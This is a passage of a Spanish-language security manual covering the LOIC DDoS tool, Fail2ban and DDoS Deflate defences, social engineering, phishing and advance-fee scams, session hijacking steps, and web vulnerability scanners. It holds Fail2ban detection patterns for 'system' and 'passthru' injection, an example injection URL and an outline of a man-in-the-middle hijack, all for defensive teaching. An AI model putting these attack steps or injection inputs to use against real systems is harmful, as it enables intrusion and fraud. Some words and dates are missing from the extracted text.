44 En las últimas versiones se ha añadido una opción para iniciar el programa oculto como un servicio de Windows. En todas las versiones de LOIC es bastante fácil conocer la dirección IP del atacante si éste no está protegido por una red Peer-to-peer anónimo. LOIQ LOIQ es una implementación de la funcionalidades de LOIC empleando el lenguaje C++ y la librería Qt 4, lo cual permite compilarlo en cualquier plataforma que disponga de la librería Qt (Linux, BSD, Unix, Windows, Windows CE, Mac OS X, etc...) JSLOIC JSLOIC es una implementación de algunas de las funcionalidades de LOIC realizadas en lenguaje JavaScript, lo cual permite ejecutarlo desde un navegador web sin necesidad de instalar ningún software en el ordenador. Esta implementación realiza test limitados a peticiones HTTP, no permitiendo el envío de paquetes TCP y UDP, ni delegar el control para su uso en modo colectivo. Podrán descargar las versiones de LOIC desde los siguientes enlaces:

45 PREVINIENDO UN DoS (D)DoS Deflate (D)DoS Deflate es un script muy sencillo diseñado para combatir el proceso de bloqueo de las direcciones IP de nuestros atacantes. Este script utiliza el comando netstat para crear una lista de las direcciones IP conectadas al servidor dependiendo de la cantidad de conexiones que tenga en un determinado momento. El comando es: netstat -ntu awk '{print $5}' cut -d: -f1 sort uniq -c sort -n En el sitio oficial encontraŕan los scripts actualizados para descargarlos y ejecutarlos. Fail2ban Fail2Ban es un pequeño script programado en python que se encarga de observar los logs en busca de patrones sospechosos, y es capaz de tomar medidas para bloquear a los atacantes ya sea con iptables o lanzando un comando de nuestra elección. El directorio de configuracion de fail2ban es /etc/fail2ban/ allí encontraremos 2 directorios: action.d y filter.d. En action.d, encontraremos las acciones que fail2ban realizará cuando alguno de nuestros filtros detecte alguna IP haciendo maldades. Estas acciones pasan por filtrado con iptables, envio de mails de aviso etc, mientras que en filter.d, tenemos todos los filtros que utilizaremos a modo de trampa para cazar a nuestros atacantes. En nuestro caso, vamos a configurar fail2ban en un servidor web, al que ultimamente se le ha detectado un alto numero de intentos de ataque de inyección, tanto SQL como XSS, y como mínimo pretendemos bloquear los accesos que hemos detectado en los logs. Para eso tendremos que editar el archivo jail.conf del directorio /etc/fail2ban/ en este archivo tendremos todas las trampas o jails y sus correspondientes acciones, acompañados de unos parametros por defecto, de entrada, es recomendable que agreguemos en la linea ignoreip nuestra ip local, o la de algun servidor con el que podamos conectar en caso de que por error nos bloqueemos nosotros mismos. ignoreip = <nuestra ip> Una vez hecho esto, revisamos todas las entradas de este archivo, la primera entrada que encontramos es la de ssh, esta jail en nuestro caso es asi: [ssh-iptables] enabled = true filter = sshd action = iptables[name=ssh, port=ssh, protocol=tcp] sendmail-whois[name=ssh, dest=root, logpath = /var/log/secure maxretry =

46 Tenemos por orden los siguientes campos: Si está habilitado El nombre La accion a ejecutar (una por linea), en este caso filtramos con el action iptables el puerto ssh y mandamos un mail con el action sendmail-whois a Indicamos el archivo de logs que leera el filtro /var/log/secure es donde logea SSH. Y le indicamos el numero de intentos con el que ejecutamos la accion (en este caso 5) Nosotros no tenemos acceso SSH al exterior en nuestras máquinas de modo que vamos a dejar enabled=false, y procederemos a configurar las siguientes jails que si que son interesantes para el servicio web: [apache-tcpwrapper] enabled = true filter = apache-auth action = hostsdeny logpath = /var/www/vhosts/*/statistics/logs/error_log maxretry = 6 [apache-badbots] enabled = true filter = apache-badbots action = iptables-multiport[name=badbots, port="http,https"] sendmail-buffered[name=badbots, lines=5, logpath = /var/www/vhosts/*/statistics/logs/access_log bantime = maxretry = 1 # Para prevenir ataques de inyeccion de codigo [php-url-fopen] enabled = true port = http,https filter = php-url-fopen logpath = /var/www/vhosts/*/statistics/logs/access_log maxretry = 1 # Evitamos ataques de ips que accedan a urls que contengan passthru o system o similares [apache-hacks] enabled = true port = http,https filter action = apache-hacks = iptables-multiport[name=ataqueapache, port="http,https"] sendmail-buffered[name=ataqueapache, lines=5, logpath = /var/www/vhosts/*/statistics/logs/access_log maxretry = 3 Lo realmente importante aqui, es cambiar las lineas logpath, ya que nuestro servidor es un plesk la ruta de los logs es /var/www/vhosts/*/statistics/logs/access_log o /var/www/vhosts/*/statistics/logs/error_log el resto, son cambios en el mail de destino al que mandaremos el mail, y los nombres de los filtros a aplicar, nosotros aplicamos estos: apache-tcpwrapper: Bloquea con el archivo /etc/hosts.deny los hosts que se

47 intentan conectar a dominios protegidos con contraseña (estos fallos de autenticación aparecen en el error_log) apache-badbots : Bloquea por iptables los hosts que se conectan haciendo uso de un User Agent sospechoso, y nos envia un mail para avisarnos php-url-fopen : Bloqueamos los hosts, que intentan una inyeccion de código del tipo: GET /index.php?n=http://www.dominio.com/archivo.htm apache-hacks : Bloquea los hosts que acceden a urls sospechosas, haciendo un SCAN o directamente acceden a urls intentando inyectar llamadas al sistema desde php (system, passthru ) esta regla se va rellenando con las expresiones que vamos encontrando en los logs, al final del post, adjuntamos el contenido del filtro en nuestro caso. En el ultimo caso, hemos creado un archivo apache-hacks.conf en el directorio filters.d, para empezar podemos agregar entradas como estas: failregex = ^<HOST> -.* (GETPOST).*\?.*passthru.* HTTP\/.*$ ^<HOST> -.* (GETPOST).*\?.*system.* HTTP\/.*$ Y mas adelante agregar nuevas reglas. Con esta serie de utilidades podremos evitar algunos de los intentos de ataque más comunes, pero no podemos ni por un momento pensar que con solo aplicarlas estaremos a salvo

48 INGENIERIA SOCIAL La ingeniería social es la práctica de obtener información confidencial a través de la manipulación de los usuarios. Es una técnica que pueden usar ciertas personas, tales como investigadores privados, criminales, o crackers, para obtener información, acceso o privilegios en sistemas que les permitan realizar algún acto que perjudique o exponga a la persona u organismo comprometido. El principio que sustenta la ingeniería social es el que en cualquier sistema "los usuarios son el eslabón más débil de la seguridad de los sistemas". En la práctica, un ingeniero social usará comúnmente el teléfono o internet para engañar a la gente, fingiendo ser, por ejemplo, un empleado de algún banco o alguna otra empresa, un compañero de trabajo, un técnico o un cliente. Vía sitios web o por medio de correos electrónicos se usa, adicionalmente, el envío de solicitudes de renovación de permisos de acceso a páginas web o memos falsos que solicitan respuestas e incluso las famosas "cadenas", llevando así a revelar información sensible, o a violar las políticas de seguridad típicas. Con este método, los ingenieros sociales aprovechan la tendencia natural de la gente a reaccionar de manera predecible en ciertas situaciones, por ejemplo proporcionando detalles financieros a un aparente funcionario de un banco, en lugar de tener que encontrar agujeros de seguridad en los sistemas informáticos. Quizá el ataque más simple pero muy efectivo sea engañar a un usuario llevándolo a pensar que un administrador del sistema esta solicitandole una contraseña para varios propósitos legítimos. Los usuarios de sistemas de Internet frecuentemente reciben mensajes que solicitan contraseñas o información de tarjeta de crédito, con el motivo de "crear una cuenta", "reactivar una configuración", u otra operación; a este tipo de ataques se los llama phishing (pesca). Los usuarios de estos sistemas deberían ser advertidos temprana y frecuentemente para que no divulguen contraseñas u otra información sensible a personas que dicen ser administradores. En realidad, los administradores de sistemas informáticos raramente (o nunca) necesitan saber la contraseña de los usuarios para llevar a cabo sus tareas. Sin embargo incluso este tipo de ataque podría no ser necesario en una encuesta realizada por la empresa Boixnet, el 90% de los empleados de oficina de la estación Waterloo de Londres revelaron sus contraseñas a cambio de un bolígrafo barato. Otro ejemplo contemporáneo de un ataque de ingeniería social es el uso de archivos adjuntos en s, ofreciendo, por ejemplo, fotos "íntimas" de alguna persona famosa o algún programa "gratis" (a menudo aparentemente provenientes de alguna persona conocida) pero que ejecutan código malicioso (por ejemplo, usar la máquina de la víctima para enviar cantidades masivas de spam). Ahora, después de que los primeros s

49 maliciosos llevaran a los proveedores de software a deshabilitar la ejecución automática de archivos adjuntos, los usuarios deben activar esos archivos de forma explícita para que ocurra una acción maliciosa. Muchos usuarios, sin embargo, abren casi ciegamente cualquier archivo adjunto recibido, concretando de esta forma el ataque. La ingeniería social también se aplica al acto de manipulación cara a cara para obtener acceso a los sistemas. Otro ejemplo es el conocimiento sobre la víctima, a través de la introducción de contraseñas habituales, lógicas típicas o conociendo su pasado y presente; respondiendo a la pregunta: Qué contraseña introduciría yo si fuese la víctima? La principal defensa contra la ingeniería social es capacitar y entrenar a los usuarios de los sistemas, en la implementación de políticas de seguridad y asegurarse de que estas sean seguidas en todo momento. Uno de los ingenieros sociales más famosos de los últimos tiempos es Kevin Mitnick a quien pueden seguir en su cuenta de Twitter https://twitter.com/#!/kevinmitnick. Según su opinión, la ingeniería social se basa en estos cuatro principios: 1. Todos queremos ayudar. 2. El primer movimiento es siempre de confianza hacia el otro. 3. No nos gusta decir No. 4. A todos nos gusta que nos alaben. Phishing El término phishing proviene de la palabra inglesa "fishing" (pesca), haciendo alusión al intento de hacer que los usuarios "piquen en el anzuelo". A quien lo practica se le llama phisher. También se dice que el término "phishing" es la contracción de "password harvesting fishing" (cosecha y pesca de contraseñas), aunque esto probablemente es un acrónimo retroactivo, dado que la escritura 'ph es comúnmente utilizada por hackers para sustituir la f, como raíz de la antigua forma de hacking telefónico conocida como phreaking. La primera mención del término phishing data de enero de Se dio en el grupo de noticias de hackers alt.2600, aunque es posible que el término ya hubiera aparecido anteriormente en la edición impresa del boletín de noticias hacker "2600 Magazine". El término phishing fue adoptado por quienes intentaban "pescar" cuentas de miembros de AOL. Phishing en AOL Quienes comenzaron a hacer phishing en AOL durante los años 1990 solían obtener cuentas para usar los servicios de esa compañía a través de números de tarjetas de crédito válidos, generados utilizando algoritmos para tal efecto. Estas cuentas de acceso a AOL podían durar semanas e incluso meses. En 1995 AOL tomó medidas para prevenir este uso

50 fraudulento de sus servicios, de modo que los crackers recurrieron al phishing para obtener cuentas legítimas en AOL. El phishing en AOL estaba estrechamente relacionado con la comunidad de warez que intercambiaba software falsificado. Un cracker se hacía pasar como un empleado de AOL y enviaba un mensaje instantáneo a una víctima potencial. Para poder engañar a la víctima de modo que diera información confidencial, el mensaje podía contener textos como "verificando cuenta" o "confirmando información de factura". Una vez el usuario enviaba su contraseña, el atacante podía tener acceso a la cuenta de la víctima y utilizarla para varios propósitos criminales, incluyendo el spam. Tanto el phishing como el warezing en AOL requerían generalmente el uso de programas escritos por crackers, como el AOLHell. En 1997 AOL reforzó su política respecto al phishing y los warez fueron terminantemente expulsados de los servidores de AOL. Durante ese tiempo el phishing era tan frecuente en AOL que decidieron añadir en su sistema de mensajería instantánea, una línea de texto que indicaba: "no one working at AOL will ask for your password or billing information" ("nadie que trabaje en AOL le pedirá a usted su contraseña o información de facturación"). Simultáneamente AOL desarrolló un sistema que desactivaba de forma automática una cuenta involucrada en phishing, normalmente antes de que la víctima pudiera responder. Los phishers se trasladaron de forma temporal al sistema de mensajería instantáneo de AOL (AIM), debido a que no podían ser expulsados del servidor de AIM. El cierre obligado de la escena de warez en AOL causó que muchos phishers dejaran el servicio, y en consecuencia la práctica.9 Intentos recientes de phishing Los intentos más recientes de phishing han tomado como objetivo a clientes de bancos y servicios de pago en línea. Aunque el ejemplo que se muestra en la primera imagen es enviado por phishers de forma indiscriminada con la esperanza de encontrar a un cliente de dicho banco o servicio, estudios recientes muestran que los phishers en un principio son capaces de establecer con qué banco una posible víctima tiene relación, y de ese modo enviar un , falseado apropiadamente, a la posible víctima

51 En términos generales, esta variante hacia objetivos específicos en el phishing se ha denominado spear phishing (literalmente pesca con arpón). Los sitios de Internet con fines sociales también se han convertido en objetivos para los phishers, dado que mucha de la información provista en estos sitios puede ser utilizada en el robo de identidad. Algunos experimentos han otorgado una tasa de éxito de un 90% en ataques phishing en redes sociales. A finales de 2006 un gusano informático se apropió de algunas páginas del sitio web MySpace logrando redireccionar los enlaces de modo que apuntaran a una página web diseñada para robar información de ingreso de los usuarios. Técnicas de phishing La mayoría de los métodos de phishing utilizan alguna forma técnica de engaño en el diseño para mostrar que un enlace en un correo electrónico parezca una copia de la organización por la cual se hace pasar el impostor. URLs mal escritas o el uso de subdominios son trucos comúnmente usados por phishers, como el ejemplo en esta URL, Otro ejemplo para disfrazar enlaces es el de utilizar direcciones que contengan el carácter para posteriormente preguntar el nombre de usuario y contraseña (contrario a los estándares). Por ejemplo, el enlace puede engañar a un observador casual y hacerlo creer que el enlace va a abrir en la página de cuando realmente el enlace envía al navegador a la página de members.tripod.com (y al intentar entrar con el nombre de usuario de si

52 no existe tal usuario, la página abrirá normalmente). Este método ha sido erradicado desde entonces en los navegadores de Mozilla e Internet Explorer. Otros intentos de phishing utilizan comandos en JavaScripts para alterar la barra de direcciones. Esto se hace poniendo una imagen de la URL de la entidad legítima sobre la barra de direcciones, o cerrando la barra de direcciones original y abriendo una nueva que contiene la URL ilegítima. En otro método popular de phishing, el atacante utiliza contra la víctima el propio código de programa del banco o servicio por el cual se hace pasar. Este tipo de ataque resulta particularmente problemático, ya que dirige al usuario a iniciar sesión en la propia página del banco o servicio, donde la URL y los certificados de seguridad parecen correctos. En este método de ataque (conocido como Cross Site Scripting) los usuarios reciben un mensaje diciendo que tienen que "verificar" sus cuentas, seguido por un enlace que parece la página web auténtica; en realidad, el enlace está modificado para realizar este ataque, además es muy difícil de detectar si no se tienen los conocimientos necesarios. Otro problema con las URL es el relacionado con el manejo de nombres de dominios internacionalizados (IDN) en los navegadores, puesto que puede ser que direcciones que resulten idénticas a la vista puedan conducir a diferentes sitios (por ejemplo dominio.com se ve similar a dοminiο.com, aunque en el segundo las letras "o" hayan sido reemplazadas por la correspondiente letra griega ómicron, "ο"). Al usar esta técnica es posible dirigir a los usuarios a páginas web con malas intenciones. A pesar de la publicidad que se ha dado acerca de este defecto, conocido como IDN spoofing o ataques homógrafos, ningún ataque conocido de phishing lo ha utilizado. Lavado de dinero producto del phishing Actualmente empresas ficticias intentan reclutar teletrabajadores por medio de s, chats, irc y otros medios, ofreciéndoles no sólo trabajar desde casa sino también otros jugosos beneficios. Aquellas personas que aceptan la oferta se convierten automáticamente en víctimas que incurren en un grave delito sin saberlo: el blanqueo de dinero obtenido a través del acto fraudulento de phishing. Para que una persona pueda darse de alta con esta clase de empresas debe rellenar un formulario en el cual indicará, entre otros datos, su número de cuenta bancaria. Esto tiene la finalidad de ingresar en la cuenta del trabajador-víctima el dinero procedente de estafas bancarias realizadas por el método de phishing. Una vez contratada, la víctima se convierte automáticamente en lo que se conoce vulgarmente como mulero. Con cada acto fraudulento de phishing la víctima recibe el cuantioso ingreso en su cuenta bancaria y la empresa le notifica del hecho. Una vez recibido este ingreso, la víctima se quedará un porcentaje del dinero total, pudiendo rondar el 10%-20%, como comisión de trabajo y el resto lo reenviará a través de sistemas de envío de dinero a cuentas indicadas por la seudo-empresa. Dado el desconocimiento de la víctima (muchas veces motivado por la necesidad económica) ésta se ve involucrada en un acto de estafa importante, pudiendo ser requerido

53 por la justicia previa denuncia de los bancos. Estas denuncias se suelen resolver con la imposición de devolver todo el dinero sustraído a la víctima, obviando que este únicamente recibió una comisión. Fases del Phishing en el lavado de dinero virtual En la primera fase, la red de estafadores se nutre de usuarios de chat, foros o correos electrónicos, a través de mensajes de ofertas de empleo con una gran rentabilidad o disposición de dinero (hoax o scam). En el caso de que caigan en la trampa, los presuntos intermediarios de la estafa, deben rellenar determinados campos, tales como: Datos personales y número de cuenta bancaria. Se comete el phishing, ya sea el envío global de millones de correos electrónicos bajo la apariencia de entidades bancarias, solicitando las claves de la cuenta bancaria (PHISHING) o con ataques específicos. El tercer paso consiste en que los estafadores comienzan a retirar sumas importantes de dinero, las cuales son transmitidas a las cuentas de los intermediarios (muleros). Los intermediarios realizan el traspaso a las cuentas de los estafadores, llevándose éstos las cantidades de dinero y aquéllos (los intermediarios) el porcentaje de la comisión. Cómo evitamos el phishing? Una estrategia para combatir el phishing adoptada por algunas empresas es la de entrenar a los empleados de modo que puedan reconocer posibles ataques phishing. Una nueva táctica de phishing donde se envían correos electrónicos de tipo phishing a una compañía determinada, conocido como spear phishing, ha motivado al entrenamiento de usuarios en varias localidades, incluyendo la Academia Militar de West Point en los Estados Unidos. En un experimento realizado en junio del 2004 con spear phishing, el 80% de los 500 cadetes de West Point a los que se les envió un falso fueron engañados y procedieron a dar información personal. Un usuario al que se le contacta mediante un mensaje electrónico y se le hace mención sobre la necesidad de "verificar" una cuenta electrónica puede o bien contactar con la compañía que supuestamente le envía el mensaje, o puede escribir la dirección web de un sitio web seguro en la barra de direcciones de su navegador para evitar usar el enlace que aparece en el mensaje sospechoso de phishing. Muchas compañías, incluyendo ebay y PayPal, siempre se dirigen a sus clientes por su nombre de usuario en los correos electrónicos, de manera que si un correo electrónico se dirige al usuario de una manera genérica como "Querido miembro de ebay" es probable que se trate de un intento de phishing. Del lado técnico hay varios programas informáticos anti-phishing disponibles. La mayoría de estos programas trabajan identificando contenidos phishing en sitios web y correos electrónicos; algunos programas anti-phishing pueden por ejemplo, integrarse con los navegadores web y clientes de correo electrónico como una barra de herramientas que muestra el dominio real del sitio visitado. Los filtros de spam también ayudan a proteger a

54 los usuarios de los phishers, ya que reducen el número de correos electrónicos relacionados con el phishing recibidos por el usuario. Muchas organizaciones han introducido la característica denominada pregunta secreta, en la que se pregunta información que sólo debe ser conocida por el usuario y la organización. En los Estados Unidos, el senador Patrick Leahy introdujo el Acta Anti-Phishing de 2005 el 1 de marzo de Esta ley federal de anti-phishing establecía que aquellos criminales que crearan páginas web falsas o enviaran spam a cuentas de con la intención de estafar a los usuarios podrían recibir una multa de hasta $250,000 USD y penas de cárcel por un término de hasta cinco años. La Estafa nigeriana La estafa nigeriana, timo nigeriano o timo 419, es un fraude, un engaño. Se lleva a cabo principalmente por correo electrónico no solicitado. Adquiere su nombre del número de artículo del código penal de Nigeria que viola, ya que buena parte de estas estafas provienen de ese país. Esta estafa consiste en ilusionar a la víctima con una fortuna inexistente y persuadirla para que pague una suma de dinero por adelantado, como condición para acceder a la supuesta fortuna. Las sumas solicitadas son bastante elevadas, pero insignificantes comparadas con la fortuna que las víctimas esperan recibir. Variantes Existen numerosas variantes de la estafa. Las más comunes son una herencia vacante que la víctima adquirirá, una cuenta bancaria abandonada, una lotería que la víctima ha ganado, un contrato de obra pública o simplemente una gran fortuna que alguien desea donar generosamente antes de morir. Algunos sostienen que la excusa de la lotería es la más común de todas. Por ejemplo, la víctima podría recibir un mensaje del tipo "Soy una persona muy rica que reside en Nigeria y necesito trasladar una suma importante al extranjero con discreción. Sería posible utilizar su cuenta bancaria?". Las sumas normalmente suelen estar cerca de decenas de millones de dólares. A la víctima se le promete un determinado porcentaje, como el 10 o el 20 por ciento. El trato propuesto se suele presentar como un delito de guante blanco inocuo con el fin de disuadir a las víctimas -los supuestos inversionistas- de llamar a las autoridades. Los timadores enviarán algunos documentos con sellos y firmas con aspecto oficial, normalmente archivos gráficos adjuntados a mensajes de correo electrónico, a quien acepte la oferta. A medida que prosiga el intercambio, se pide a la víctima que envíe dinero, con la excusa de supuestos honorarios, gastos, sobornos, impuestos o comisiones. Se va creando una sucesión de excusas de todo tipo, pero siempre se mantiene la promesa del traspaso de una cantidad millonaria. A menudo se ejerce presión psicológica, por ejemplo alegando que la parte nigeriana tendría que vender todas sus pertenencias y pedir un préstamo para poder

55 pagar algunos gastos y sobornos. A veces, se invita a la víctima a viajar a determinados países africanos, entre ellos Nigeria y Sudáfrica. Esto es especialmente peligroso, porque en ocasiones el supuesto inversor puede acabar secuestrado o incluso asesinado por el timador. En cualquier caso, la transferencia nunca llega, pues las millonarias sumas de dinero jamás han existido. Las operaciones están organizadas con gran profesionalidad en países como Nigeria, Sierra Leona, Costa de Marfil, Ghana, Togo, Benín y Sudáfrica. Cuentan con oficinas, números de fax, teléfonos celulares y a veces con sitios fraudulentos en internet. Últimamente, gran cantidad de estafadores provenientes del África Occidental se han establecido en diversas ciudades europeas, especialmente Ámsterdam, Londres y Madrid, etc, como también en Dubái. A menudo se persuade a las víctimas a viajar allí para cobrar sus millones. Tipos comunes de timo nigeriano La clásica estafa nigeriana o africana Una supuesta autoridad gubernamental, bancaria o petrolera africana solicita al destinatario los datos de su cuenta bancaria con el objeto de transferir a ella grandes sumas de dinero que desean sacar del país, a cambio de una sustanciosa comisión. En caso de que la víctima acepte y tras una serie de contactos por correo electrónico, fax o teléfono, se le solicita que envíe dinero para hacer frente a gastos inesperados o sobornos. Por supuesto ni las cantidades adelantadas serán nunca restituidas, ni se recibirán jamás los beneficios prometidos. Animales regalados Se anuncian en páginas de venta y regalo de animales. Normalmente ofrecen alguna raza de animal especialmente valorada como por ejemplo "Regalo Yorkshire". Son anuncios mal redactados, con un castellano absolutamente deficiente que seguramente proviene de un traductor automático de nuestro idioma. Cuentan que tienen que mudarse y necesitan regalar sus perritos o cualquier otro animal. Cuando algún interesado contesta que acepta, dicen que hay que enviarles el dinero para que puedan enviar por avión desde allí el animal. Suelen mandar información falsa haciéndose pasar por el aeropuerto para "informar" de cómo envían los cachorros y a qué se deben los gastos. Si se llega más adelante y se paga esa cantidad (que suele ser pequeña para que la gente se lo plantee), mandan mensajes de otros aeropuertos a los que el cachorro supuestamente ha sido enviado por error, solicitando un nuevo envío de dinero para poder completar la supuesta entrega

56 El capitán militar en Irak Contestan a los anuncios de venta de los que sea (terrenos, casas...) solicitando información. Al obtener respuesta, envían un correo electrónico alegando ser militares que necesitan invertir un dinero que han obtenido del crudo, pero que como militares que son lo tienen que entregar a alguien en quien puedan confiar, ya que es ilegal que se lo queden a título personal y para ello solicitan los datos de la víctima de la estafa para enviar supuestamente el dinero en concepto de compra de la propiedad en venta. Como en los otros casos, en algún momento los timadores solicitarán a la víctima que pague algún tipo de gasto. El timo de la lotería El mensaje anuncia al destinatario que ha obtenido un premio de la lotería, aun cuando no haya participado en sorteo alguno. La mecánica luego del mensaje es similar al caso anterior: tras sucesivos contactos se solicita un desembolso para cubrir los gastos ocasionados por algún trámite. La gran difusión de este fenómeno en España ha provocado que el Organismo Nacional de Loterías y Apuestas del Estado haya publicado un aviso al respecto en su página web. El Tío de América Los supuestos albaceas de un desconocido y adinerado pariente anuncian su fallecimiento y notifican al destinatario su inclusión entre los beneficiarios del testamento. En este caso a menudo se utilizan técnicas de ingeniería social, por ejemplo haciendo coincidir el apellido del difunto con el del destinatario. En ocasiones se sugiere con ambigüedad que el destinatario se haga pasar por un pariente del difunto, para evitar perder la herencia, que será repartida entre el abogado/albacea y la víctima. Una variante de esta estafa es la "herencia en vida", en que alguien supuestamente aquejado de una enfermedad terminal, sin familia, contacta a la víctima con el fin de darle su dinero para que realice obras de caridad, ayudando a los pobres o desamparados. Como en los otros casos, en algún momento los timadores solicitarán a la víctima que pague algún tipo de gasto. El prisionero español o peruano Este timo tiene un origen muy anterior a los previos, a comienzos del siglo XX. Uno de los timadores, el confidente, contacta con la víctima para explicarle que está en contacto con una persona muy famosa e influyente que está encerrada en una cárcel española (o según versiones más modernas, de algún país africano) bajo una identidad falsa. No puede revelar su identidad para obtener su libertad, ya que esa acción tendría repercusiones muy graves, y le ha pedido al confidente que consiga suficiente dinero para pagar su defensa o fianza. El confidente ofrece a la víctima la oportunidad de aportar parte del dinero, a cambio de una recompensa extremadamente generosa cuando el prisionero

57 salga libre. Sin embargo, una vez entregado el dinero surgen complicaciones que necesitan de más dinero, hasta que la víctima ya no puede o quiere dar más. En ese momento se acaba el timo y el confidente desaparece. La venta del teléfono móvil (celular) en ebay En este fraude, los timadores localizan a usuarios particulares de ebay que ofrezcan teléfonos móviles. Ofrecen una puja muy alta en el último momento, ganando así la subasta. Luego contactan al vendedor para explicarle que desean enviar el móvil a un supuesto hijo que trabaja como misionero en Nigeria, y que necesitan conocer la cuenta Paypal del vendedor para pagar (en vez de pagar directamente vía Paypal, a través de los enlaces proporcionados por ebay al final de cada subasta). A continuación envían un mensaje con las cabeceras falsificadas para que parezca provenir de Paypal, en que se confirma que el pago se ha realizado. Cuando el vendedor intenta comprobar el pago desde el enlace en el mensaje, será dirigido a una web falsa, con la apariencia de ser de Paypal. En esta página se le explica que por seguridad, el pago será transferido a su cuenta solo cuando se realice el envío. Obviamente, si envía el móvil al comprador, nunca recibirá el dinero. La compensación El mensaje informa a la víctima de que el Estado nigeriano le compensará por haber sido víctima de la "Estafa Nigeriana", aunque la potencial víctima no lo haya sido. Las sumas ofrecidas van desde US$ a US$ La víctima debe contactar a un funcionario, quien le pedirá el depósito de una suma de alrededor de US $1.000 para asuntos burocráticos de la cobranza de la compensación. El Nuevo Amor Es una de las más comunes. Consiste en que una supuesta mujer, generalmente nativa de Sudán o Nigeria, envía a un correo electrónico una solicitud de amistad y fotografías personales. Los nombres más usados del emisor son: Edith Kassala o Aline

58 HIJACKING El termino hijacking significa secuestro en inglés y en el ámbito informático hace referencia a toda técnica ilegal que lleve consigo el adueñarse o robar algo (generalmente información) por parte de un atacante. Es por tanto un concepto muy abierto y que puede aplicarse a varios ámbitos, de esta manera podemos encontramos con el secuestro de conexiones de red, sesiones de terminal, servicios, modems y un largo etcétera en cuanto a servicios informáticos se refiere. Algunos ejemplos de Hijacking IP hijakers: secuestro de una conexión TCP/IP por ejemplo durante una sesión Telnet permitiendo a un atacante inyectar comandos o realizar un DoS durante dicha sesión. Page hijacking: secuestro de página web. Hace referencia a las modificaciones que un atacante realiza sobre una página web, normalmente haciendo uso de algún bug de seguridad del servidor o de programación del sitio web, también es conocido como defacement o desfiguración. Reverse domain hijacking o Domain hijacking: secuestro de dominio Session hijacking: secuestro de sesión Browser hijacking: Se llama así al efecto de apropiación que realizan algunos spyware sobre el navegador web lanzando popups, modificando la página de inicio, modificando la página de búsqueda predeterminada etc. Es utilizado por un tipo de software malware el cual altera la configuración interna de los navegadores de internet de un ordenador. El termino "secuestro" hace referencia a que éstas modificaciones se hacen sin el permiso y el conocimiento del usuario. Algunos de éstos son fáciles de eliminar del sistema, mientras que otros son extremadamente complicados de eliminar y revertir sus cambios. Home Page Browser hijacking: secuestro de la página de inicio del navegador. Esto sucede cuando la página de inicio, en la que navegamos es cambiada por otra a interés del secuestrador. Generalmente son páginas en las que nos invita a usar los servicios de la página para que nuestro equipo esté seguro y funcione correctamente. No cabe decir que es a cambio de un pago y que el origen del error y mal funcionamiento del equipo es debido a nuestro secuestrador Modem hijacking: secuestro del Modem. Esta expresión es en ocasiones utilizada para referirse a la estafa de los famosos dialers que tanta guerra dieron en su día (antes del auge del ADSL) y que configuran sin el consentimiento del usuario nuevas conexiones a números de cobro extraordinario

59 SESSION HIJACKING Cuando usted se conecta a su cuenta bancaria en línea con su nombre de usuario, password y demás, se crea una sesión entre su computadora y los servidores del banco con el tiempo o duración de la conexión (por ejemplo, 5 minutos) utilizando una cookie que permite mantener una sesión con un número de identificación propio, información del usuario, preferencias, hábitos, etc. Pero el problema con las sesiones es que se pueden secuestrar. Por eso es que le definen un tiempo, por ejemplo 5 minutos para que al completarse los 5 minutos la conexión se cierra automáticamente para que usted tenga que ingresar nuevamente (por motivos de seguridad) su nombre de usuario y password y le sale un mensaje diciéndole que su sesión a expirado. Seguramente ya le habrá sucedido en varias ocasiones. Si una sesión es secuestrada y esa sesión dura mucho tiempo, mucho más tiempo tendra el atacante para hacerse pasar por usted. Las sesiones de los sistemas deben estar limitadas a un periodo de 3 a 5 minutos de inactividad. Transcurrido este tiempo, la sesión debe expirar. Esto no lo digo para que se asuste y deje de usar su cuenta online. Los bancos hoy en día tienen altas medidas de seguridad en internet, de hecho son los sitios más difíciles o casi imposibles de vulnerar y si lo atrapan puede ser condenado hasta con 30 años de prisión, dependiendo del pais en el que se haya cometido el ilícito

60 Qué es el secuestro de sesiones? El secuestro de las sesiones es tomar el control sobre una sesión TCP que está siendo intercambiada entre 2 computadoras (cliente/servidor). Esto se lleva a cabo mediante la implementación de un sniffer como Wireshark para lograr un ataque man-in-the-middle y de esa forma capturar la información de la sesión. El atacante necesita que el usuario legítimo haga una conexión y una autentificación (login) para poder tomar el control de la sesión existente. Pasos para secuestrar una sesión web 1. El atacante debe situarse entre la víctima y el objetivo (cliente/servidor) y tener la habilidad de realizar sniffing en la red (lo que normalmente se conoce como un ataque man-in-the-middle ) 2. Monitorear el flujo de paquetes 3. Capturar la sesión de la víctima 4. Tomar el control de la sesión

61 VULNERABILIDADES EN APLICACIONES WEB Una de los principales motivos causales de ataques sobre nuestros servidores son las vulneravilidades que poseen nuestras aplicaciones web o peor aún cuando nuestros servidores están mal configurados o poseen mal seteados los permisos. Estas son algunas de las aplicaciones web para explotar vulnerabilidades w3af: Un proyecto basado en un framework completamente extensible mediante plugins, el cual ya incluye una gran cantidad en su sitio que manejan distintos tipos de detecciones, auditorias, ataques por fuerza bruta, etc. También open source y creado en Python. (http://w3af.sourceforge.net/) Grabber: Su creador lo define como un webscanner muy sencillo y simple, pero aún así es capaz de detectar inyecciones SQL, Cross-Site Scripting, y analizar código Javascript. Básicamente se trata de un script en Python, por lo que requiere Python 2.4, además de los paquetes BeautifulSoup y PyXML. Por ende también es plausible de correr en cualquier sistema que tenga soporte para este lenguaje. (http://rgaucher.info/beta/grabber/) Nikto: Además de ser open source, Nikto afirma detectar alrededor de 3500 archivos potencialmente peligrosos, las versiones de 900 servidores, y problemas específicos en 250 versiones diferentes. En este caso se compone de un script creado en Perl, por lo que también puede ejecutarse en cualquier sistema operativo que tenga instalado el soporte para este lenguaje. (http://cirt.net/nikto2) Wapiti: Otro proyecto open source, capaz de escanear por inyecciones en bases de datos, Cross Site Scripting, inyección LDAP y ejecuciones de comandos entre otros. También creado en Python. (http://wapiti.sourceforge.net/) SPIKE Proxy: Aplicación open source creada por la compañía Immunity, también bajo el lenguaje Python, que cubre lo básico como inyección SQL y Cross-Site Scripting. (http://www.immunitysec.com/resources-freesoftware.shtml) OWASP Pantera Web Assessment Studio Project: Basado en SPIKE Proxy, este proyecto lo mejora para convertirse en una herramienta de penetration testing, capaz de generar reportes, soportar plugins, y diversas utilidades incorporadas como anti- IDS, fuzzing, web spider, brute force y escnaneo de cgi. (http://www.owasp.org/index.php/category:owasp_pantera_web_assessment_stu dio_project) Sandcat: Permite realizar alrededor de 260 comprobaciones de seguridad, cubriendo 38 tipos de ataques vía web. También escanea los sitios contra los ranking de vulnerabilidades más populares, 